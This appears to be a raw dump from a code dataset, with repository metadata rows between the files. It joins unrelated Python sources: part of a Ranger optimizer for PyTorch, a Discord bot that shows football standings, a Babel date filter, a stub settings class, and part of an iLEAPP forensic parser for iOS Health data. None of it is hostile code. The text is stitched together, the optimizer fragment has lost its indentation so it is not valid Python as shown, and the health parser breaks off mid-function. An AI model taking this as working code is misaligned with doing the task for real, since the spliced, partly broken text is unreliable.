super().__init__(params,defaults)
#now we can get to work...
for group in self.param_groups:
group["step_counter"] = 0
#print("group step counter init")
#look ahead params
self.alpha = alpha
self.k = k
#radam buffer for state
self.radam_buffer = [[None,None,None] for ind in range(10)]
#lookahead weights
self.slow_weights = [[p.clone().detach() for p in group['params']]
for group in self.param_groups]
#don't use grad for lookahead weights
for w in it.chain(*self.slow_weights):
w.requires_grad = False
def __setstate__(self, state):
print("set state called")
super(Ranger, self).__setstate__(state)
def step(self, closure=None):
loss = None
#note - below is commented out b/c I have other work that passes back the loss as a float, and thus not a callable closure.
#Uncomment if you need to use the actual closure...
#if closure is not None:
#loss = closure()
#------------ radam
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data.float()
if grad.is_sparse:
raise RuntimeError('RAdam does not support sparse gradients')
p_data_fp32 = p.data.float()
state = self.state[p]
if len(state) == 0:
state['step'] = 0
state['exp_avg'] = torch.zeros_like(p_data_fp32)
state['exp_avg_sq'] = torch.zeros_like(p_data_fp32)
else:
state['exp_avg'] = state['exp_avg'].type_as(p_data_fp32)
state['exp_avg_sq'] = state['exp_avg_sq'].type_as(p_data_fp32)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
beta1, beta2 = group['betas']
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
exp_avg.mul_(beta1).add_(1 - beta1, grad)
state['step'] += 1
buffered = self.radam_buffer[int(state['step'] % 10)]
if state['step'] == buffered[0]:
N_sma, step_size = buffered[1], buffered[2]
else:
buffered[0] = state['step']
beta2_t = beta2 ** state['step']
N_sma_max = 2 / (1 - beta2) - 1
N_sma = N_sma_max - 2 * state['step'] * beta2_t / (1 - beta2_t)
buffered[1] = N_sma
if N_sma > 5:
step_size = group['lr'] * math.sqrt((1 - beta2_t) * (N_sma - 4) / (N_sma_max - 4) * (N_sma - 2) / N_sma * N_sma_max / (N_sma_max - 2)) / (1 - beta1 ** state['step'])
else:
step_size = group['lr'] / (1 - beta1 ** state['step'])
buffered[2] = step_size
if group['weight_decay'] != 0:
p_data_fp32.add_(-group['weight_decay'] * group['lr'], p_data_fp32)
if N_sma > 5:
denom = exp_avg_sq.sqrt().add_(group['eps'])
p_data_fp32.addcdiv_(-step_size, exp_avg, denom)
else:
p_data_fp32.add_(-step_size, exp_avg)
p.data.copy_(p_data_fp32)
#---------------- end radam step
#look ahead tracking and updating if latest batch = k
for group,slow_weights in zip(self.param_groups,self.slow_weights):
group['step_counter'] += 1
if group['step_counter'] % self.k != 0:
continue
for p,q in zip(group['params'],slow_weights):
if p.grad is None:
continue
q.data.add_(self.alpha,p.data - q.data)
p.data.copy_(q.data)
return loss | 42.688187 | 190 | 0.542395 | 3,817 | 31,077 | 4.235525 | 0.084359 | 0.035628 | 0.028206 | 0.008227 | 0.887796 | 0.877281 | 0.863549 | 0.857549 | 0.8479 | 0.836766 | 0 | 0.02783 | 0.351353 | 31,077 | 728 | 191 | 42.688187 | 0.774184 | 0.206294 | 0 | 0.87033 | 0 | 0 | 0.090471 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043956 | false | 0 | 0.017582 | 0 | 0.092308 | 0.002198 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
24af655686e7fc5daa5b027b80f2d4b37aa03e8c | 3,346 | py | Python | commands/results/standings.py | PyGera/fantacalcio-bot | bf9f8aba45d8c21b22255267764077d443e3ee10 | [
"MIT"
] | 2 | 2021-10-08T23:14:23.000Z | 2021-11-01T15:34:21.000Z | commands/results/standings.py | PyGera/fantacalcio-bot | bf9f8aba45d8c21b22255267764077d443e3ee10 | [
"MIT"
] | 1 | 2021-10-17T00:16:06.000Z | 2021-10-17T00:16:06.000Z | commands/results/standings.py | PyGera/fantacalcio-bot | bf9f8aba45d8c21b22255267764077d443e3ee10 | [
"MIT"
] | null | null | null | import discord
import requests
async def standings(ctx, client, FOOTBALL_API_HEADERS):
params = (
("season_id","2100"),
)
standing_req = requests.get('https://app.sportdataapi.com/api/v1/soccer/standings', headers=FOOTBALL_API_HEADERS, params=params).json()
embedVar = discord.Embed(
title="Classifica Serie A TIM",
color=0x00197d
)
embedVar.set_thumbnail(url="https://www.legaseriea.it/assets/legaseriea/images/logo_main_seriea.png?v=34")
for team in standing_req['data']['standings']:
team_data = {}
params = (
("country_id", "62"),
)
teams_req = requests.get(f'https://app.sportdataapi.com/api/v1/soccer/teams/{team["team_id"]}', headers=FOOTBALL_API_HEADERS, params=params).json()
team_data = teams_req['data']
logo_stand = ''
if team['position'] == 1:
logo_stand = 'scudetto'
elif team['result'] == 'Champions League':
logo_stand = 'champions'
elif team['result'] == 'Europa League':
logo_stand = 'europa'
elif team['result'] == 'Conference League Qualification':
logo_stand = 'conference'
elif team['result'] == 'Relegation':
logo_stand = 'serieb'
embedVar.add_field(name='\u200b', value=f"**{team['position']} {str(discord.utils.get(client.emojis, name=team_data['short_code']))} {team_data['name']} ** {team['points']} {str(discord.utils.get(client.emojis, name=logo_stand)) if logo_stand != '' else ''}", inline=False)
message = await ctx.reply(embed=embedVar, mention_author=False)
emojis = ["🔁"]
for emoji in emojis:
await message.add_reaction(emoji)
async def standings_now(message, client, FOOTBALL_API_HEADERS):
params = (
("season_id","2100"),
)
standing_req = requests.get('https://app.sportdataapi.com/api/v1/soccer/standings', headers=FOOTBALL_API_HEADERS, params=params).json()
embedVar = discord.Embed(
title="Classifica Serie A TIM",
color=0x00197d
)
embedVar.set_thumbnail(url="https://www.legaseriea.it/assets/legaseriea/images/logo_main_seriea.png?v=34")
for team in standing_req['data']['standings']:
team_data = {}
params = (
("country_id", "62"),
)
teams_req = requests.get(f'https://app.sportdataapi.com/api/v1/soccer/teams/{team["team_id"]}', headers=FOOTBALL_API_HEADERS, params=params).json()
team_data = teams_req['data']
logo_stand = ''
if team['position'] == 1:
logo_stand = 'scudetto'
elif team['result'] == 'Champions League':
logo_stand = 'champions'
elif team['result'] == 'Europa League':
logo_stand = 'europa'
elif team['result'] == 'Conference League Qualification':
logo_stand = 'conference'
elif team['result'] == 'Relegation':
logo_stand = 'serieb'
embedVar.add_field(name='\u200b', value=f"**{team['position']} {str(discord.utils.get(client.emojis, name=team_data['short_code']))} {team_data['name']} ** {team['points']} {str(discord.utils.get(client.emojis, name=logo_stand)) if logo_stand != '' else ''}", inline=False)
message = await message.edit(embed=embedVar, mention_author=False)
| 34.854167 | 282 | 0.621339 | 394 | 3,346 | 5.116751 | 0.238579 | 0.071429 | 0.055556 | 0.071429 | 0.928571 | 0.897817 | 0.897817 | 0.897817 | 0.897817 | 0.897817 | 0 | 0.015367 | 0.222056 | 3,346 | 95 | 283 | 35.221053 | 0.75874 | 0 | 0 | 0.769231 | 0 | 0.061538 | 0.371488 | 0.062762 | 0 | 0 | 0.004782 | 0 | 0 | 1 | 0 | false | 0 | 0.030769 | 0 | 0.030769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
70147bd744f1cac8ecfdd7a22ac758539e6dd2b1 | 157 | py | Python | redtrics/core/filters.py | Redmart/redtrics | 3af32593faebe543a89f922cd3b53d1e594cc586 | [
"MIT"
] | 2 | 2016-05-05T15:27:06.000Z | 2016-05-06T07:29:44.000Z | redtrics/core/filters.py | Redmart/redtrics | 3af32593faebe543a89f922cd3b53d1e594cc586 | [
"MIT"
] | null | null | null | redtrics/core/filters.py | Redmart/redtrics | 3af32593faebe543a89f922cd3b53d1e594cc586 | [
"MIT"
] | 1 | 2020-03-03T07:41:03.000Z | 2020-03-03T07:41:03.000Z | # -*- coding: utf-8 -*-
from babel import dates
def format_datetime(value, format='medium'):
return dates.format_datetime(value, format, locale='en')
| 19.625 | 60 | 0.700637 | 21 | 157 | 5.142857 | 0.714286 | 0.259259 | 0.351852 | 0.462963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007463 | 0.146497 | 157 | 7 | 61 | 22.428571 | 0.798507 | 0.133758 | 0 | 0 | 0 | 0 | 0.059701 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 8 |
568fc4f691f5945800b3e9998615293e9cc29761 | 536 | py | Python | libotp/settings/Settings.py | AnonymousDeveloper65535/open-toontown | 3d05c22a7d960ad843dde231140447c46973dba5 | [
"BSD-3-Clause"
] | 1 | 2019-11-23T21:54:23.000Z | 2019-11-23T21:54:23.000Z | libotp/settings/Settings.py | AnonymousDeveloper65535/open-toontown | 3d05c22a7d960ad843dde231140447c46973dba5 | [
"BSD-3-Clause"
] | null | null | null | libotp/settings/Settings.py | AnonymousDeveloper65535/open-toontown | 3d05c22a7d960ad843dde231140447c46973dba5 | [
"BSD-3-Clause"
] | null | null | null | class Settings:
GL = 0
DX7 = 1
DX8 = 5
@staticmethod
def readSettings():
pass # todo
@staticmethod
def getWindowedMode():
return 1
@staticmethod
def getMusic():
return 1
@staticmethod
def getSfx():
return 1
@staticmethod
def getToonChatSounds():
return 1
@staticmethod
def getMusicVolume():
return 1
@staticmethod
def getSfxVolume():
return 1
@staticmethod
def getResolution():
return 1
| 14.486486 | 28 | 0.55597 | 48 | 536 | 6.208333 | 0.4375 | 0.402685 | 0.38255 | 0.442953 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035821 | 0.375 | 536 | 36 | 29 | 14.888889 | 0.853731 | 0.007463 | 0 | 0.535714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027778 | 0 | 1 | 0.285714 | false | 0.035714 | 0 | 0.25 | 0.678571 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
3b1f2b34667815a386eab1ab9c6dea6a366a463b | 22,160 | py | Python | scripts/artifacts/healthAll.py | rathbuna/iLEAPP | 391ddfab2257875fdf8181c84eb29a4992b60af7 | [
"MIT"
] | 2 | 2021-02-09T21:46:14.000Z | 2021-06-14T12:26:55.000Z | scripts/artifacts/healthAll.py | rathbuna/iLEAPP | 391ddfab2257875fdf8181c84eb29a4992b60af7 | [
"MIT"
] | null | null | null | scripts/artifacts/healthAll.py | rathbuna/iLEAPP | 391ddfab2257875fdf8181c84eb29a4992b60af7 | [
"MIT"
] | 1 | 2020-12-11T10:07:28.000Z | 2020-12-11T10:07:28.000Z | import glob
import os
import pathlib
import plistlib
import sqlite3
import json
import textwrap
import scripts.artifacts.artGlobals
from packaging import version
from scripts.artifact_report import ArtifactHtmlReport
from scripts.ilapfuncs import logfunc, tsv, timeline, is_platform_windows
from scripts.ccl import ccl_bplist
from scripts.parse3 import ParseProto
def get_healthAll(files_found, report_folder, seeker):
file_found = str(files_found[0])
db = sqlite3.connect(file_found)
iOSversion = scripts.artifacts.artGlobals.versionf
if version.parse(iOSversion) >= version.parse("12"):
cursor = db.cursor()
cursor.execute('''
SELECT
DATETIME(SAMPLES.START_DATE + 978307200, 'UNIXEPOCH') AS "START DATE",
DATETIME(SAMPLES.END_DATE + 978307200, 'UNIXEPOCH') AS "END DATE",
METADATA_VALUES.NUMERICAL_VALUE AS "SPM (strides/min)",
CASE WORKOUTS.ACTIVITY_TYPE
WHEN 63 THEN "HIGH INTENSITY INTERVAL TRAINING (HIIT)"
WHEN 37 THEN "INDOOR / OUTDOOR RUN"
WHEN 3000 THEN "OTHER"
WHEN 52 THEN "INDOOR / OUTDOOR WALK"
WHEN 20 THEN "FUNCTIONAL TRAINING"
WHEN 13 THEN "INDOOR CYCLE"
WHEN 16 THEN "ELLIPTICAL"
WHEN 35 THEN "ROWER"
ELSE "UNKNOWN" || "-" || WORKOUTS.ACTIVITY_TYPE
END "WORKOUT TYPE",
WORKOUTS.DURATION / 60.00 AS "DURATION (IN MINUTES)",
WORKOUTS.TOTAL_ENERGY_BURNED AS "CALORIES BURNED",
WORKOUTS.TOTAL_DISTANCE AS "DISTANCE IN KILOMETERS",
WORKOUTS.TOTAL_DISTANCE*0.621371 AS "DISTANCE IN MILES",
WORKOUTS.TOTAL_BASAL_ENERGY_BURNED AS "TOTAL BASEL ENERGY BURNED",
CASE WORKOUTS.GOAL_TYPE
WHEN 2 THEN "MINUTES"
WHEN 0 THEN "OPEN"
END "GOAL TYPE",
WORKOUTS.GOAL AS "GOAL",
WORKOUTS.TOTAL_FLIGHTS_CLIMBED AS "FLIGHTS CLIMBED",
WORKOUTS.TOTAL_W_STEPS AS "STEPS"
FROM
SAMPLES
LEFT OUTER JOIN
METADATA_VALUES
ON METADATA_VALUES.OBJECT_ID = SAMPLES.DATA_ID
LEFT OUTER JOIN
METADATA_KEYS
ON METADATA_KEYS.ROWID = METADATA_VALUES.KEY_ID
LEFT OUTER JOIN
WORKOUTS
ON WORKOUTS.DATA_ID = SAMPLES.DATA_ID
WHERE
WORKOUTS.ACTIVITY_TYPE NOT NULL AND KEY IS "_HKPrivateWorkoutAverageCadence"
''')
all_rows = cursor.fetchall()
usageentries = len(all_rows)
if usageentries > 0:
data_list = []
for row in all_rows:
data_list.append((row[0],row[1],row[2],row[3],row[4],row[5],row[6],row[7],row[8],row[9],row[10],row[11],row[12]))
report = ArtifactHtmlReport('Health Workout Cadence')
report.start_artifact_report(report_folder, 'Workout Cadence')
report.add_script()
data_headers = ('Start Date','End Date','Strides per Min.','Workout Type','Duration in Mins.','Calories Burned','Distance in KM','Distance in Miles','Total Base Energy','Goal Type','Goal','Flights Climbed','Steps' )
report.write_artifact_data_table(data_headers, data_list, file_found)
report.end_artifact_report()
tsvname = 'Health Workout Cadence'
tsv(report_folder, data_headers, data_list, tsvname)
tlactivity = 'Health Workout Cadence'
timeline(report_folder, tlactivity, data_list)
else:
logfunc('No data available in Workout Cadence')
if version.parse(iOSversion) >= version.parse("9"):
cursor = db.cursor()
cursor.execute(
"""
SELECT
DATETIME(SAMPLES.START_DATE + 978307200, 'UNIXEPOCH') AS "START DATE",
DATETIME(SAMPLES.END_DATE + 978307200, 'UNIXEPOCH') AS "END DATE",
QUANTITY AS "DISTANCE IN METERS",
QUANTITY*3.28084 AS "DISTANCE IN FEET",
(SAMPLES.END_DATE-SAMPLES.START_DATE) AS "TIME IN SECONDS",
SAMPLES.DATA_ID AS "SAMPLES TABLE ID"
FROM
SAMPLES
LEFT OUTER JOIN
QUANTITY_SAMPLES
ON SAMPLES.DATA_ID = QUANTITY_SAMPLES.DATA_ID
LEFT OUTER JOIN
CORRELATIONS
ON SAMPLES.DATA_ID = CORRELATIONS.OBJECT
WHERE
SAMPLES.DATA_TYPE = 8
"""
)
all_rows = cursor.fetchall()
usageentries = len(all_rows)
data_list = []
if usageentries == 0:
logfunc('No data available in Distance')
else:
for row in all_rows:
data_list.append((row[0], row[1], row[2], row[3], row[4], row[5] ))
description = ''
report = ArtifactHtmlReport('Health Distance')
report.start_artifact_report(report_folder, 'Distance', description)
report.add_script()
data_headers = ('Start Date','End Date','Distance in Meters','Distance in Feet','Time in Seconds','Samples Table ID' )
report.write_artifact_data_table(data_headers, data_list, file_found)
report.end_artifact_report()
tsvname = 'Health Distance'
tsv(report_folder, data_headers, data_list, tsvname)
tlactivity = 'Health Distance'
timeline(report_folder, tlactivity, data_list)
if version.parse(iOSversion) >= version.parse("12"):
cursor = db.cursor()
cursor.execute(
"""
SELECT
DATETIME(SAMPLES.START_DATE + 978307200, 'UNIXEPOCH') AS "START DATE",
DATETIME(SAMPLES.END_DATE + 978307200, 'UNIXEPOCH') AS "END DATE",
METADATA_VALUES.NUMERICAL_VALUE AS "ECG AVERAGE HEARTRATE",
(SAMPLES.END_DATE-SAMPLES.START_DATE) AS "TIME IN SECONDS"
FROM
SAMPLES
LEFT OUTER JOIN
METADATA_VALUES
ON METADATA_VALUES.OBJECT_ID = SAMPLES.DATA_ID
LEFT OUTER JOIN
METADATA_KEYS
ON METADATA_KEYS.ROWID = METADATA_VALUES.KEY_ID
LEFT OUTER JOIN
WORKOUTS
ON WORKOUTS.DATA_ID = SAMPLES.DATA_ID
WHERE
KEY IS "_HKPrivateMetadataKeyElectrocardiogramHeartRate"
"""
)
all_rows = cursor.fetchall()
usageentries = len(all_rows)
data_list = []
if usageentries == 0:
logfunc('No data available in ECG Avg. Heart Rate')
else:
for row in all_rows:
data_list.append((row[0], row[1], row[2], row[3] ))
description = ''
report = ArtifactHtmlReport('Health ECG Avg Heart Rate')
report.start_artifact_report(report_folder, 'ECG Avg. Heart Rate', description)
report.add_script()
data_headers = ('Start Date','End Date','ECG Avg. Heart Rate','Time in Seconds' )
report.write_artifact_data_table(data_headers, data_list, file_found)
report.end_artifact_report()
tsvname = 'Health ECG Avg Heart Rate'
tsv(report_folder, data_headers, data_list, tsvname)
tlactivity = 'Health ECG Avg Heart Rate'
timeline(report_folder, tlactivity, data_list)
if version.parse(iOSversion) >= version.parse("12"):
cursor = db.cursor()
cursor.execute('''
SELECT
DATETIME(SAMPLES.START_DATE + 978307200, 'UNIXEPOCH') AS "START DATE",
DATETIME(SAMPLES.END_DATE + 978307200, 'UNIXEPOCH') AS "END DATE",
METADATA_VALUES.NUMERICAL_VALUE/100.00 AS "ELEVATION (METERS)",
(METADATA_VALUES.NUMERICAL_VALUE/100.00)*3.28084 AS "ELEVATION (FEET)",
CASE WORKOUTS.ACTIVITY_TYPE
WHEN 63 THEN "HIGH INTENSITY INTERVAL TRAINING (HIIT)"
WHEN 37 THEN "INDOOR / OUTDOOR RUN"
WHEN 3000 THEN "OTHER"
WHEN 52 THEN "INDOOR / OUTDOOR WALK"
WHEN 20 THEN "FUNCTIONAL TRAINING"
WHEN 13 THEN "INDOOR CYCLE"
WHEN 16 THEN "ELLIPTICAL"
WHEN 35 THEN "ROWER"
ELSE "UNKNOWN" || "-" || WORKOUTS.ACTIVITY_TYPE
END "WORKOUT TYPE",
WORKOUTS.DURATION / 60.00 AS "DURATION (IN MINUTES)",
WORKOUTS.TOTAL_ENERGY_BURNED AS "CALORIES BURNED",
WORKOUTS.TOTAL_DISTANCE AS "DISTANCE IN KILOMETERS",
WORKOUTS.TOTAL_DISTANCE*0.621371 AS "DISTANCE IN MILES",
WORKOUTS.TOTAL_BASAL_ENERGY_BURNED AS "TOTAL BASEL ENERGY BURNED",
CASE WORKOUTS.GOAL_TYPE
WHEN 2 THEN "MINUTES"
WHEN 0 THEN "OPEN"
END "GOAL TYPE",
WORKOUTS.GOAL AS "GOAL",
WORKOUTS.TOTAL_FLIGHTS_CLIMBED AS "FLIGHTS CLIMBED",
WORKOUTS.TOTAL_W_STEPS AS "STEPS"
FROM
SAMPLES
LEFT OUTER JOIN
METADATA_VALUES
ON METADATA_VALUES.OBJECT_ID = SAMPLES.DATA_ID
LEFT OUTER JOIN
METADATA_KEYS
ON METADATA_KEYS.ROWID = METADATA_VALUES.KEY_ID
LEFT OUTER JOIN
WORKOUTS
ON WORKOUTS.DATA_ID = SAMPLES.DATA_ID
WHERE
WORKOUTS.ACTIVITY_TYPE NOT NULL AND (KEY IS "_HKPrivateWorkoutElevationAscendedQuantity" OR KEY IS "HKElevationAscended")
''')
all_rows = cursor.fetchall()
usageentries = len(all_rows)
if usageentries > 0:
data_list = []
for row in all_rows:
data_list.append((row[0],row[1],row[2],row[3],row[4],row[5],row[6],row[7],row[8],row[9],row[10],row[11],row[12],row[13]))
report = ArtifactHtmlReport('Health Workout Indoor Elevation')
report.start_artifact_report(report_folder, 'Workout Indoor Elevation')
report.add_script()
data_headers = ('Start Date','End Date','Elevation in Meters','Elevation in Feet','Workout Type','Duration in Min.','Calories Burned','Distance in KM','Distance in Miles','Total Base Energy Burned','Goal Type','Goal','Flights Climbed','Steps' )
report.write_artifact_data_table(data_headers, data_list, file_found)
report.end_artifact_report()
tsvname = 'Health Workout Indoor Elevation'
tsv(report_folder, data_headers, data_list, tsvname)
tlactivity = 'Health Workout Indoor Elevation'
timeline(report_folder, tlactivity, data_list)
else:
logfunc('No data available in Workout Indoor Elevation')
if version.parse(iOSversion) >= version.parse("9"):
cursor = db.cursor()
cursor.execute(
"""
SELECT
DATETIME(SAMPLES.START_DATE + 978307200, 'UNIXEPOCH') AS "START DATE",
DATETIME(SAMPLES.END_DATE + 978307200, 'UNIXEPOCH') AS "END DATE",
QUANTITY AS "FLIGHTS CLIMBED",
(SAMPLES.END_DATE-SAMPLES.START_DATE) AS "TIME IN SECONDS",
SAMPLES.DATA_ID AS "SAMPLES TABLE ID"
FROM
SAMPLES
LEFT OUTER JOIN
QUANTITY_SAMPLES
ON SAMPLES.DATA_ID = QUANTITY_SAMPLES.DATA_ID
WHERE
SAMPLES.DATA_TYPE = 12
"""
)
all_rows = cursor.fetchall()
usageentries = len(all_rows)
data_list = []
if usageentries == 0:
logfunc('No data available in Flights Climbed')
else:
for row in all_rows:
data_list.append((row[0], row[1], row[2], row[3], row[4] ))
description = ''
report = ArtifactHtmlReport('Health Flights Climbed')
report.start_artifact_report(report_folder, 'Flights Climbed', description)
report.add_script()
data_headers = ('Start Date','End Date','Flights Climbed','Time in Seconds','Samples Table ID' )
report.write_artifact_data_table(data_headers, data_list, file_found)
report.end_artifact_report()
tsvname = 'Health Flights Climbed'
tsv(report_folder, data_headers, data_list, tsvname)
tlactivity = 'Health Flights Climbed'
timeline(report_folder, tlactivity, data_list)
if version.parse(iOSversion) >= version.parse("9"):
cursor = db.cursor()
cursor.execute(
"""
SELECT
DATETIME(SAMPLES.START_DATE + 978307200, 'UNIXEPOCH') AS "DATE",
ORIGINAL_QUANTITY AS "HEART RATE",
UNIT_STRINGS.UNIT_STRING AS "UNITS",
QUANTITY AS "QUANTITY",
SAMPLES.DATA_ID AS "SAMPLES TABLE ID"
FROM
SAMPLES
LEFT OUTER JOIN
QUANTITY_SAMPLES
ON SAMPLES.DATA_ID = QUANTITY_SAMPLES.DATA_ID
LEFT OUTER JOIN
UNIT_STRINGS
ON QUANTITY_SAMPLES.ORIGINAL_UNIT = UNIT_STRINGS.ROWID
WHERE
SAMPLES.DATA_TYPE = 5
"""
)
all_rows = cursor.fetchall()
usageentries = len(all_rows)
data_list = []
if usageentries == 0:
logfunc('No data available in Heart Rate')
else:
for row in all_rows:
data_list.append((row[0], row[1], row[2], row[3], row[4] ))
description = ''
report = ArtifactHtmlReport('Health Heart Rate')
report.start_artifact_report(report_folder, 'Heart Rate', description)
report.add_script()
data_headers = ('Date','Heart Rate','Units','Quantity','Samples Table ID' )
report.write_artifact_data_table(data_headers, data_list, file_found)
report.end_artifact_report()
tsvname = 'Health Heart Rate'
tsv(report_folder, data_headers, data_list, tsvname)
tlactivity = 'Health Heart Rate'
timeline(report_folder, tlactivity, data_list)
if version.parse(iOSversion) >= version.parse("9"):
cursor = db.cursor()
cursor.execute('''
SELECT
DATETIME(SAMPLES.START_DATE + 978307200, 'UNIXEPOCH') AS "START DATE",
DATETIME(SAMPLES.END_DATE + 978307200, 'UNIXEPOCH') AS "END DATE",
QUANTITY AS "STOOD UP",
(SAMPLES.END_DATE-SAMPLES.START_DATE) AS "TIME IN SECONDS",
SAMPLES.DATA_ID AS "SAMPLES TABLE ID"
FROM
SAMPLES
LEFT OUTER JOIN
QUANTITY_SAMPLES
ON SAMPLES.DATA_ID = QUANTITY_SAMPLES.DATA_ID
WHERE
SAMPLES.DATA_TYPE = 75
''')
all_rows = cursor.fetchall()
usageentries = len(all_rows)
if usageentries > 0:
data_list = []
for row in all_rows:
data_list.append((row[0],row[1],row[2],row[3],row[4]))
report = ArtifactHtmlReport('Health Stood Up')
report.start_artifact_report(report_folder, 'Stood Up')
report.add_script()
data_headers = ('Start Date','End Date','Stood Up','TIme in Seconds','Table ID' )
report.write_artifact_data_table(data_headers, data_list, file_found)
report.end_artifact_report()
tsvname = 'Health Stood Up'
tsv(report_folder, data_headers, data_list, tsvname)
tlactivity = 'Health Stood Up'
timeline(report_folder, tlactivity, data_list)
else:
logfunc('No data available in Stood Up')
if version.parse(iOSversion) >= version.parse("9"):
cursor = db.cursor()
cursor.execute('''
SELECT
DATETIME(SAMPLES.START_DATE + 978307200, 'UNIXEPOCH') AS "START DATE",
DATETIME(SAMPLES.END_DATE + 978307200, 'UNIXEPOCH') AS "END DATE",
QUANTITY AS "STEPS",
(SAMPLES.END_DATE-SAMPLES.START_DATE) AS "TIME IN SECONDS",
SAMPLES.DATA_ID AS "SAMPLES TABLE ID"
FROM
SAMPLES
LEFT OUTER JOIN
QUANTITY_SAMPLES
ON SAMPLES.DATA_ID = QUANTITY_SAMPLES.DATA_ID
WHERE
SAMPLES.DATA_TYPE = 7
''')
all_rows = cursor.fetchall()
usageentries = len(all_rows)
if usageentries > 0:
data_list = []
for row in all_rows:
data_list.append((row[0],row[1],row[2],row[3],row[4]))
report = ArtifactHtmlReport('Health Steps')
report.start_artifact_report(report_folder, 'Steps')
report.add_script()
data_headers = ('Start Date','End Date','Steps','Time in Seconds','Samples Table ID' )
report.write_artifact_data_table(data_headers, data_list, file_found)
report.end_artifact_report()
tsvname = 'Health Steps'
tsv(report_folder, data_headers, data_list, tsvname)
tlactivity = 'Health Steps'
timeline(report_folder, tlactivity, data_list)
else:
logfunc('No data available in Steps')
if version.parse(iOSversion) >= version.parse("9"):
cursor = db.cursor()
cursor.execute('''
SELECT
DATETIME(SAMPLES.START_DATE + 978307200, 'UNIXEPOCH') AS "DATE",
QUANTITY AS "WEIGHT (IN KG)",
QUANTITY*2.20462 AS "WEIGHT (IN LBS)",
SAMPLES.DATA_ID AS "SAMPLES TABLE ID"
FROM
SAMPLES
LEFT OUTER JOIN QUANTITY_SAMPLES ON SAMPLES.DATA_ID = QUANTITY_SAMPLES.DATA_ID
WHERE
SAMPLES.DATA_TYPE = 3
AND "DATE" IS NOT NULL
''')
all_rows = cursor.fetchall()
usageentries = len(all_rows)
if usageentries > 0:
data_list = []
for row in all_rows:
data_list.append((row[0],row[1],row[2],row[3]))
report = ArtifactHtmlReport('Health Weight')
report.start_artifact_report(report_folder, 'Weight')
report.add_script()
data_headers = ('Date','Weight in KG','Weight in LBS','Samples Table ID' )
report.write_artifact_data_table(data_headers, data_list, file_found)
report.end_artifact_report()
tsvname = 'Health Weight'
tsv(report_folder, data_headers, data_list, tsvname)
tlactivity = 'Health Weight'
timeline(report_folder, tlactivity, data_list)
else:
logfunc('No data available in Weight')
if version.parse(iOSversion) >= version.parse("9"):
cursor = db.cursor()
cursor.execute('''
SELECT
DATETIME(SAMPLES.START_DATE + 978307200, 'UNIXEPOCH') AS "START DATE",
DATETIME(SAMPLES.END_DATE + 978307200, 'UNIXEPOCH') AS "END DATE",
CASE WORKOUTS.ACTIVITY_TYPE
WHEN 63 THEN "HIGH INTENSITY INTERVAL TRAINING (HIIT)"
WHEN 37 THEN "INDOOR / OUTDOOR RUN"
WHEN 3000 THEN "OTHER"
WHEN 52 THEN "INDOOR / OUTDOOR WALK"
WHEN 20 THEN "FUNCTIONAL TRAINING"
WHEN 13 THEN "INDOOR CYCLE"
WHEN 16 THEN "ELLIPTICAL"
WHEN 35 THEN "ROWER"
ELSE "UNKNOWN" || "-" || WORKOUTS.ACTIVITY_TYPE
END "WORKOUT TYPE",
WORKOUTS.DURATION / 60.00 AS "DURATION (IN MINUTES)",
WORKOUTS.TOTAL_ENERGY_BURNED AS "CALORIES BURNED",
WORKOUTS.TOTAL_DISTANCE AS "DISTANCE IN KILOMETERS",
WORKOUTS.TOTAL_DISTANCE*0.621371 AS "DISTANCE IN MILES",
WORKOUTS.TOTAL_BASAL_ENERGY_BURNED AS "TOTAL BASEL ENERGY BURNED",
CASE WORKOUTS.GOAL_TYPE
WHEN 2 THEN "MINUTES"
WHEN 0 THEN "OPEN"
END "GOAL TYPE",
WORKOUTS.GOAL AS "GOAL",
WORKOUTS.TOTAL_FLIGHTS_CLIMBED AS "FLIGHTS CLIMBED",
WORKOUTS.TOTAL_W_STEPS AS "STEPS"
FROM
SAMPLES
LEFT OUTER JOIN
METADATA_VALUES
ON METADATA_VALUES.OBJECT_ID = SAMPLES.DATA_ID
LEFT OUTER JOIN
METADATA_KEYS
ON METADATA_KEYS.ROWID = METADATA_VALUES.KEY_ID
LEFT OUTER JOIN
WORKOUTS
ON WORKOUTS.DATA_ID = SAMPLES.DATA_ID
WHERE
WORKOUTS.ACTIVITY_TYPE NOT NULL
AND (KEY IS NULL OR KEY IS "HKIndoorWorkout")
''')
all_rows = cursor.fetchall()
usageentries = len(all_rows)
if usageentries > 0:
data_list = []
for row in all_rows:
data_list.append((row[0],row[1],row[2],row[3],row[4],row[5],row[6],row[7],row[8],row[9],row[10],row[11]))
report = ArtifactHtmlReport('Health Workout General')
report.start_artifact_report(report_folder, 'Workout General')
report.add_script()
